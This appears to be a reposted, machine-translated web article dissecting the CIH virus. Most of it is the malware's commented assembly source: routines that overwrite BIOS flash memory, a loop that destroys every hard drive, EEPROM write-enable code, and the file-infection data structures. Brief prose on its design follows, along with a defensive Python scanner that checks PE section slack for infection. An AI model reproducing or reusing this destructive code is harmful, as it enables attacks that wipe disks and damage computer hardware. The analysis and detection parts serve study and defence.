Virus program Source code example Anatomy-CIH virus [5]

Source: Internet
Author: User

Push ECX
Loop $
  
; destroys the ROM data of additional 000e0000-000e007f segments in the BIOS, a total of 80h bytes
XOR Ah, ah
mov [EAX], AL
  
Xchg ecx, eax
Loop $
  
; Displays and activates the BIOS 000E0000-000FFFFF segment data, a total of KB, the segment can be written to information mov eax, 0f5555h
Pop ecx
mov ch, 0aah
Call EBX
mov byte ptr [eax], 20h
  
Loop $
  
; Destroy BIOS 000fe000-000fe07f segment data, total 80h bytes
mov ah, 0e0h
mov [EAX], AL
  
; Hide BIOS 000f0000-000fffff segment, total KB
mov word ptr (booleancalculatecode-@10) [esi], 100ch
Call ESI
  
; Destroy all hard drives
Killharddisk:
XOR ebx, EBX
mov bh, Firstkillharddisknumber
Push EBX
Sub ESP, 2CH
Push 0c0001000h
mov bh, 08h
Push EBX
Push ECX
Push ECX
Push ECX
Push 40000501h
Inc ECX
Push ECX
Push ECX
  
mov esi, esp
Sub ESP, 0ach
  
; Cycle for Destruction
Loopofkillharddisk:
int 20h
DD 00100004h
  
CMP word ptr [esi+06h], 0017h
Je killnextdatasection
  
; Replace a hard drive
Changenextharddisk:
Inc byte PTR [ESI+4DH]
  
JMP Loopofkillharddisk
  
; Destroy the next area.
Killnextdatasection:
Add DWORD ptr [esi+10h], ebx
mov byte ptr [ESI+4DH], Firstkillharddisknumber
  
JMP Loopofkillharddisk
  
; Enable EEPROM to write information
Enableeepromtowrite:
mov [EAX], cl
mov [ECX], AL
mov byte ptr [eax], 80h
mov [EAX], cl
mov [ECX], AL
  
Ret
  
Ioforeeprom:
@10 = Ioforeeprom
  
Xchg eax, EDI
Xchg edx, EBP
Out DX, eax
  
Xchg eax, EDI
Xchg edx, EBP
In AL, DX
  
Booleancalculatecode = $
Or AL, 44h
  
Xchg eax, EDI
Xchg edx, EBP
Out DX, eax
  
Xchg eax, EDI
Xchg edx, EBP
Out DX, AL
  
Ret
  
; static data definition
Lastvxdcalladdress = Ifsmgr_ring0_fileio; the last call to the VXD command address
Vxdcalladdresstable DB 00h
DB ifsmgr_removefilesystemapihook-_pageallocate
DB Unitobcspath-ifsmgr_removefilesystemapihook
DB Ifsmgr_ring0_fileio-unitobcspath; difference of each VXD invocation instruction address
  
vxdcallidtable DD 00010053h, 00400068h, 00400041h, 00400032h; The invocation number of the VxD
Vxdcalltablesize = ($-vxdcallidtable)/04h; number of VxD calls used in the program
  
; Virus version and copyright information definition
Virusversioncopyright db ' CIH v '; Identification of the CIH virus
DB majorvirusversion+ ' 0 '; major version number
DB '. '
DB minorvirusversion+ ' 0 '; minor version number
DB ' Tatung '; author's name
  
; Virus size
Virussize = $ + sizeofviruscodesectiontableendmark (04h)
+ numberofsections*sizeofviruscodesectiontable (08h)
+ sizeofthefirstviruscodesectiontable (04h)
  
; Dynamic Data definition
Virusgamedatastartaddress = Virussize
@6 = virusgamedatastartaddress; virus data start address
  
Onbusy db 0; " Busy "flag
Filemodificationtime DD?; file modification Time
  
FileNameBuffer db filenamebuffersize dup (?); 7fh long file name buffer
@7 = FileNameBuffer
  
DataBuffer = $
@8 = DataBuffer
Numberofsections DW?; Number of blocks
TimeDateStamp DD?; File time
Symbolspointer DD?
Numberofsymbols DD?; Number of symbols in the symbol table
Sizeofoptionalheader DW?; length of optional file header
_characteristics DW?; Character Set flags
Magic DW?; sign Word (always 010BH)
Linkerversion DW?; Connector version number
Sizeofcode DD?; code Snippet Size
Sizeofinitializeddata DD?; initialized Chunk size
Sizeofuninitializeddata DD?; uninitialized chunk size
Addressofentrypoint DD?; program Start RVA
Baseofcode DD?; code snippet Start RVA
Baseofdata DD?; Data segment Start RVA
ImageBase DD?; Loading base address RVA
  
@9 = $
Sectionalignment DD?; block alignment
FileAlignment DD?; File Block alignment
operatingSystemVersion DD?; Required operating system version number
Imageversion DD?; user-defined version number
Subsystemversion DD?; Required subsystem version number
Reserved DD?; Keep
Sizeofimage DD?; Total length of each part of the document
Sizeofheaders dd?; file Header Size
Sizeofimageheadertoread = $-numberofsections
Newaddressofentrypoint = DataBuffer
Sizeofimageheadertowrite = 04h
  
Startofsectiontable = @9
SectionName = startofsectiontable; block name
VirtualSize = startofsectiontable+08h; segment true length
virtualaddress = startofsectiontable+0ch; RVA of Block
Sizeofrawdata = startofsectiontable+10h; Block physical length
Pointertorawdata = startofsectiontable+14h; Block physical offset
Pointertorelocations = startofsectiontable+18h; Relocation Offset
Pointertolinenumbers = startofsectiontable+1ch; Offset of the row number table
Numberofrelocations = startofsectiontable+20h; Number of relocated items
Numberoflinennmbers = startofsectiontable+22h; Number of row number tables
characteristics = startofsectiontable+24h; Block properties
sizeofscetiontable = Characteristics+04h-sectionname; The length of each table entry
  
; The amount of memory required by the virus
Virusneedbasememory = $
  
Virustotalneedmemory = @9
; + numberofsections (??) *sizeofscetiontable (28h)
; + Sizeofviruscodesectiontableendmark (04h)
; + numberofsections (??) *sizeofviruscodesectiontable (08h)
; + sizeofthefirstviruscodesectiontable (04h)
  
; End of virus program
Virusgame ENDS
END Fileheader
From the above code analysis we can see that the CIH virus has a clear structure with distinct layers. The main structure of the virus program is very similar to that of a DOS virus, except that the details are handled in the Windows 95 way and all system calls go through VxDs. This makes the virus program more low-level, more efficient and easier to write: compared with calling Windows API functions, the virus does not need a complicated relocation process of its own, and compared with using interrupts, it also resists tracing and analysis.

The CIH virus has two innovations. First, when infecting a file it looks for unused space between the sections of the target file and writes its own data structures and code into that space (if the free space is insufficient, the file is not infected, which is one reason why some files escape infection). Second, when its payload triggers it can destroy computer hardware: it not only overwrites the flash memory of the BIOS but also destroys the hard disk.
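The section-slack infection described above can be checked for from the defender's side using the same PE header fields the listing defines (VirtualSize, SizeOfRawData, PointerToRawData, FileAlignment). The following is an added example, not code from the page or from the CIH author: a scanner that walks the section table and reports non-zero bytes in the unused, file-aligned tail of each section, where a normal linker leaves zero padding. The PE image is constructed in memory as test data; `build_sample_pe` and `scan_section_slack` are names assumed here.

```python
import struct

FILE_ALIGN = 0x200  # FileAlignment of the constructed sample image

def build_sample_pe(slack_payload: bytes = b"") -> bytes:
    """Construct a minimal PE32 image with one section whose SizeOfRawData exceeds
    VirtualSize; slack_payload is written into that unused tail. Test data only."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: i386, 1 section, SizeOfOptionalHeader 0xE0 (PE32), executable flags
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x10F)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)        # Magic: PE32 (010Bh, as in the listing)
    struct.pack_into("<I", opt, 0x20, 0x1000)       # SectionAlignment
    struct.pack_into("<I", opt, 0x24, FILE_ALIGN)   # FileAlignment
    text_used = 0x40                                # VirtualSize: bytes really in use
    sect = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", text_used, 0x1000, FILE_ALIGN, FILE_ALIGN, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + sect).ljust(FILE_ALIGN, b"\0")
    body = bytearray(b"\x90" * text_used).ljust(FILE_ALIGN, b"\0")  # used code, zero tail
    body[text_used:text_used + len(slack_payload)] = slack_payload
    return headers + bytes(body)

def scan_section_slack(pe: bytes) -> list:
    """For each section with SizeOfRawData > VirtualSize, count non-zero bytes in the
    unused tail and note whether the listing's 'CIH v' identification string is there."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    sect_tbl = coff + 20 + opt_size                  # section table follows the optional header
    findings = []
    for i in range(num_sections):
        off = sect_tbl + i * 0x28                    # 28h bytes per entry, as in the listing
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _va, rawsize, rawptr = struct.unpack_from("<IIII", pe, off + 8)
        if rawsize <= vsize:
            continue
        tail = pe[rawptr + vsize:rawptr + rawsize]   # slack between used data and alignment
        findings.append({"section": name, "slack_offset": rawptr + vsize,
                         "slack_len": len(tail), "nonzero": sum(1 for b in tail if b),
                         "cih_marker": b"CIH v" in tail})
    return findings
```

Non-zero slack is a heuristic, not proof of infection: some packers and linkers also leave data in section tails, so treat a hit as a reason to inspect the file, not as a verdict.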

For security reasons, we have not given a detailed analysis of the parts of the code that handle the virus trigger and the hardware destruction.
